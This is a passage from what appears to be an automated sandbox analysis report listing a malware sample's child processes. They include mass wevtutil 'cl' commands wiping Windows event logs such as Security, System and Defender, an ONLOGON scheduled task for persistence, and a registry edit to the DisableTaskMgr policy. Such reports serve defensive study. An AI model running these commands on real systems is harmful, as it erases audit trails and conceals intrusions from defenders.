    3⤵
    PID:560
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ReadyBoostDriver/Analytic"
    3⤵
    PID:1876
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ReadyBoostDriver/Operational"
    3⤵
    PID:1628
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Recovery/Operational"
    3⤵
    PID:728
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ReliabilityAnalysisComponent/Operational"
    3⤵
    PID:1776
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-RemoteApp and Desktop Connections/Admin"
    3⤵
    PID:1816
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-RemoteAssistance/Admin"
    3⤵
    PID:1420
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-RemoteAssistance/Operational"
    3⤵
    - Clears Windows event logs
    PID:1956
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-RemoteAssistance/Tracing"
    3⤵
    PID:1480
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Admin"
    3⤵
    PID:1500
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational"
    3⤵
    PID:1476
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Remotefs-UTProvider/Diagnostic"
    3⤵
    PID:1176
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Resource-Exhaustion-Detector/Operational"
    3⤵
    PID:544
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Resource-Exhaustion-Resolver/Operational"
    3⤵
    PID:1988
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Resource-Leak-Diagnostic/Operational"
    3⤵
    PID:304
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ResourcePublication/Tracing"
    3⤵
    PID:1820
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-RestartManager/Operational"
    3⤵
    PID:2004
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Search-Core/Diagnostic"
    3⤵
    - Clears Windows event logs
    PID:820
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Search-ProtocolHandlers/Diagnostic"
    3⤵
    PID:1432
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Security-Audit-Configuration-Client/Diagnostic"
    3⤵
    - Clears Windows event logs
    PID:1204
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Security-Audit-Configuration-Client/Operational"
    3⤵
    PID:1088
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Security-IdentityListener/Operational"
    3⤵
    PID:1828
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Security-SPP/Perf"
    3⤵
    PID:1708
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Sens/Debug"
    3⤵
    PID:904
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ServiceReportingApi/Debug"
    3⤵
    PID:1136
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Services-Svchost/Diagnostic"
    3⤵
    PID:1312
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Services/Diagnostic"
    3⤵
    PID:1992
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Setup/Analytic"
    3⤵
    PID:524
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-SetupCl/Analytic"
    3⤵
    PID:1588
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-SetupQueue/Analytic"
    3⤵
    PID:1788
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-SetupUGC/Analytic"
    3⤵
    - Clears Windows event logs
    PID:1792
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ShareMedia-ControlPanel/Diagnostic"
    3⤵
    - Clears Windows event logs
    PID:900
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-BootAnim/Diagnostic"
    3⤵
    PID:792
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-Common/Diagnostic"
    3⤵
    PID:1364
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-CredUI/Diagnostic"
    3⤵
    PID:684
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-Logon/Diagnostic"
    3⤵
    PID:568
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-PasswordProvider/Diagnostic"
    3⤵
    PID:1996
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-Shutdown/Diagnostic"
    3⤵
    PID:1584
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Shell-Core/Diagnostic"
    3⤵
    PID:1016
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Shell-DefaultPrograms/Diagnostic"
    3⤵
    PID:1340
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Shell-Shwebsvc"
    3⤵
    PID:1620
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Shell-ZipFolder/Diagnostic"
    3⤵
    PID:1608
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Shsvcs/Diagnostic"
    3⤵
    PID:1576
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Sidebar/Diagnostic"
    3⤵
    PID:1180
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Speech-UserExperience/Diagnostic"
    3⤵
    PID:216
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Spell-Checking/Analytic"
    3⤵
    PID:616
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-SpellChecker/Analytic"
    3⤵
    PID:1764
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-StickyNotes/Admin"
    3⤵
    PID:1796
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-StickyNotes/Debug"
    3⤵
    PID:228
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-StickyNotes/Diagnostic"
    3⤵
    PID:236
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-StorDiag/Operational"
    3⤵
    PID:1784
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-StorPort/Operational"
    3⤵
    PID:1676
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Subsys-Csr/Operational"
    3⤵
    PID:204
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Subsys-SMSS/Operational"
    3⤵
    PID:952
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Superfetch/Main"
    3⤵
    PID:1664
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Superfetch/StoreLog"
    3⤵
    PID:1240
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Sysprep/Analytic"
    3⤵
    PID:1096
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-SystemHealthAgent/Diagnostic"
    3⤵
    PID:1696
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TCPIP/Diagnostic"
    3⤵
    PID:108
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TSF-msctf/Debug"
    3⤵
    PID:1660
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TSF-msctf/Diagnostic"
    3⤵
    PID:2000
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TSF-msutb/Debug"
    3⤵
    PID:1840
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TSF-msutb/Diagnostic"
    3⤵
    PID:1328
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TZUtil/Operational"
    3⤵
    PID:1520
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TaskScheduler/Debug"
    3⤵
    PID:780
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TaskScheduler/Diagnostic"
    3⤵
    - Clears Windows event logs
    PID:1712
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TaskScheduler/Operational"
    3⤵
    PID:1640
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TaskbarCPL/Diagnostic"
    3⤵
    PID:1984
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Admin"
    3⤵
    - Clears Windows event logs
    PID:1704
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Analytic"
    3⤵
    - Clears Windows event logs
    PID:1804
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Debug"
    3⤵
    PID:1600
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Operational"
    3⤵
    PID:220
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Admin"
    3⤵
    PID:212
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Analytic"
    3⤵
    PID:1688
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Debug"
    3⤵
    PID:664
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Operational"
    3⤵
    PID:224
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-MediaRedirection/Analytic"
    3⤵
    PID:1540
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Admin"
    3⤵
    - Clears Windows event logs
    PID:432
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Analytic"
    3⤵
    PID:608
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Debug"
    3⤵
    PID:764
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Operational"
    3⤵
    PID:232
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-RDPClient/Analytic"
    3⤵
    PID:1396
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-RDPClient/Debug"
    3⤵
    PID:324
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-RDPClient/Operational"
    3⤵
    PID:1072
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-RdpSoundDriver/Capture"
    3⤵
    PID:1868
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-RdpSoundDriver/Playback"
    3⤵
    PID:1348
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Admin"
    3⤵
    - Clears Windows event logs
    PID:1728
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Analytic"
    3⤵
    PID:812
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Debug"
    3⤵
    - Clears Windows event logs
    PID:1516
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational"
    3⤵
    - Clears Windows event logs
    PID:1144
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-ServerUSBDevices/Admin"
    3⤵
    PID:1880
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-ServerUSBDevices/Analytic"
    3⤵
    PID:1768
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-ServerUSBDevices/Debug"
    3⤵
    PID:1428
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-ServerUSBDevices/Operational"
    3⤵
    PID:832
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ThemeCPL/Diagnostic"
    3⤵
    PID:1076
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ThemeUI/Diagnostic"
    3⤵
    PID:572
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TunnelDriver"
    3⤵
    PID:1780
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-UAC-FileVirtualization/Operational"
    3⤵
    PID:208
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-UAC/Operational"
    3⤵
    PID:948
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-UIAnimation/Diagnostic"
    3⤵
    - Clears Windows event logs
    PID:360
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-UIAutomationCore/Debug"
    3⤵
    PID:1872
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-UIAutomationCore/Diagnostic"
    3⤵
    PID:856
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-UIAutomationCore/Perf"
    3⤵
    PID:588
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-UIRibbon/Diagnostic"
    3⤵
    PID:1168
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-USB-USBHUB/Diagnostic"
    3⤵
    PID:560
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-USB-USBPORT/Diagnostic"
    3⤵
    PID:1876
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-User Control Panel Performance/Diagnostic"
    3⤵
    PID:1628
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-User Profile Service/Diagnostic"
    3⤵
    PID:728
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-User Profile Service/Operational"
    3⤵
    - Clears Windows event logs
    PID:1776
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-User-Loader/Analytic"
    3⤵
    - Clears Windows event logs
    PID:1816
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-UserModePowerService/Diagnostic"
    3⤵
    PID:1420
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-UserPnp/DeviceMetadata/Debug"
    3⤵
    PID:1956
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-UserPnp/DeviceNotifications"
    3⤵
    PID:1480
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-UserPnp/Performance"
    3⤵
    PID:1500
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-UserPnp/SchedulerOperations"
    3⤵
    PID:1476
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-UxTheme/Diagnostic"
    3⤵
    PID:1176
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-VAN/Diagnostic"
    3⤵
    PID:544
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-VDRVROOT/Operational"
    3⤵
    PID:1988
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-VHDMP/Operational"
    3⤵
    PID:304
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-VWiFi/Diagnostic"
    3⤵
    PID:1820
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-VolumeControl/Performance"
    3⤵
    PID:2004
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-VolumeSnapshot-Driver/Operational"
    3⤵
    - Clears Windows event logs
    PID:820
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WABSyncProvider/Analytic"
    3⤵
    PID:1432
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WCN-Config-Registrar/Diagnostic"
    3⤵
    PID:1204
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WER-Diag/Operational"
    3⤵
    PID:1088
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WFP/Analytic"
    3⤵
    PID:1828
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WFP/Operational"
    3⤵
    PID:1708
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WLAN-AutoConfig/Operational"
    3⤵
    PID:904
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WLAN-Autoconfig/Diagnostic"
    3⤵
    PID:1136
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WLANConnectionFlow/Diagnostic"
    3⤵
    PID:1312
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WMI-Activity/Trace"
    3⤵
    PID:1992
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WMPDMCCore/Diagnostic"
    3⤵
    PID:524
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WMPDMCUI/Diagnostic"
    3⤵
    - Clears Windows event logs
    PID:1588
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WMPNSS-PublicAPI/Diagnostic"
    3⤵
    PID:1788
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WMPNSS-Service/Diagnostic"
    3⤵
    - Clears Windows event logs
    PID:1792
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WMPNSSUI/Diagnostic"
    3⤵
    PID:900
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WPD-ClassInstaller/Analytic"
    3⤵
    PID:792
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WPD-ClassInstaller/Operational"
    3⤵
    PID:1364
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WPD-CompositeClassDriver/Analytic"
    3⤵
    PID:684
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WPD-CompositeClassDriver/Operational"
    3⤵
    - Clears Windows event logs
    PID:568
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WPD-MTPClassDriver/Operational"
    3⤵
    PID:1996
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WSC-SRV/Diagnostic"
    3⤵
    PID:1584
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WUSA/Debug"
    3⤵
    PID:1016
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WWAN-MM-Events/Diagnostic"
    3⤵
    PID:1340
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WWAN-NDISUIO-EVENTS/Diagnostic"
    3⤵
    PID:1640
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WWAN-SVC-Events/Diagnostic"
    3⤵
    PID:1608
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WWAN-UI-Events/Diagnostic"
    3⤵
    PID:1576
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WebIO-NDF/Diagnostic"
    3⤵
    PID:1180
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WebIO/Diagnostic"
    3⤵
    - Clears Windows event logs
    PID:216
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WebServices/Tracing"
    3⤵
    PID:616
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Win32k/Concurrency"
    3⤵
    - Clears Windows event logs
    PID:1764
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Win32k/Power"
    3⤵
    PID:1796
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Win32k/Render"
    3⤵
    PID:228
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Win32k/Tracing"
    3⤵
    - Clears Windows event logs
    PID:236
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Win32k/UIPI"
    3⤵
    PID:1784
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WinHTTP-NDF/Diagnostic"
    3⤵
    PID:1676
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WinHttp/Diagnostic"
    3⤵
    PID:204
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WinINet/Analytic"
    3⤵
    PID:952
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WinRM/Analytic"
    3⤵
    PID:1664
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WinRM/Debug"
    3⤵
    - Clears Windows event logs
    PID:1240
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WinRM/Operational"
    3⤵
    PID:1096
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Windeploy/Analytic"
    3⤵
    PID:1696
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Windows Defender/Operational"
    3⤵
    PID:108
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Windows Defender/WHC"
    3⤵
    PID:1660
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Windows Firewall With Advanced Security/ConnectionSecurity"
    3⤵
    PID:2000
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Windows Firewall With Advanced Security/ConnectionSecurityVerbose"
    3⤵
    PID:1840
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Windows Firewall With Advanced Security/Firewall"
    3⤵
    PID:1328
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Windows Firewall With Advanced Security/FirewallVerbose"
    3⤵
    PID:1520
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WindowsBackup/ActionCenter"
    3⤵
    PID:780
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WindowsColorSystem/Debug"
    3⤵
    PID:1712
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WindowsColorSystem/Operational"
    3⤵
    PID:1620
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WindowsSystemAssessmentTool/Operational"
    3⤵
    PID:1984
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WindowsSystemAssessmentTool/Tracing"
    3⤵
    PID:1704
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WindowsUpdateClient/Operational"
    3⤵
    PID:1804
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Wininit/Diagnostic"
    3⤵
    PID:1600
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Winlogon/Diagnostic"
    3⤵
    PID:220
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Winlogon/Operational"
    3⤵
    - Clears Windows event logs
    PID:212
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Winsock-AFD/Operational"
    3⤵
    PID:1688
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Winsock-WS2HELP/Operational"
    3⤵
    PID:664
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Winsrv/Analytic"
    3⤵
    PID:224
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Wired-AutoConfig/Diagnostic"
    3⤵
    PID:1540
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Wired-AutoConfig/Operational"
    3⤵
    PID:432
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Wordpad/Admin"
    3⤵
    PID:608
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Wordpad/Debug"
    3⤵
    PID:764
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Wordpad/Diagnostic"
    3⤵
    PID:232
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-mobsync/Diagnostic"
    3⤵
    PID:1396
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ntshrui"
    3⤵
    PID:324
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-osk/Diagnostic"
    3⤵
    PID:1072
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-stobject/Diagnostic"
    3⤵
    PID:1868
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "OAlerts"
    3⤵
    PID:1348
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Security"
    3⤵
    PID:1728
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Setup"
    3⤵
    - Clears Windows event logs
    PID:812
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "System"
    3⤵
    PID:1516
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "TabletPC_InputPanel_Channel"
    3⤵
    PID:1144
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "WINDOWS_MP4SDECD_CHANNEL"
    3⤵
    PID:1880
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "WINDOWS_MSMPEG2VDEC_CHANNEL"
    3⤵
    PID:1768
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "WINDOWS_WMPHOTO_CHANNEL"
    3⤵
    PID:1428
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "WMPSetup"
    3⤵
    PID:832
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "WMPSyncEngine"
    3⤵
    PID:1076
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Windows PowerShell"
    3⤵
    PID:572
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "microsoft-windows-RemoteDesktopServices-RemoteDesktopSessionManager/Admin"
    3⤵
    PID:1780
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "muxencode"
    3⤵
    PID:208
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN exp /TR C:\Windows\explorer.exe /F
  2⤵
  PID:948
- - C:\Windows\system32\schtasks.exe
    schtasks /CREATE /SC ONLOGON /TN exp /TR C:\Windows\explorer.exe /F
    3⤵
    - Creates scheduled task(s)
    PID:1088
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0 /f
  2⤵
  PID:1796
- - C:\Windows\system32\reg.exe
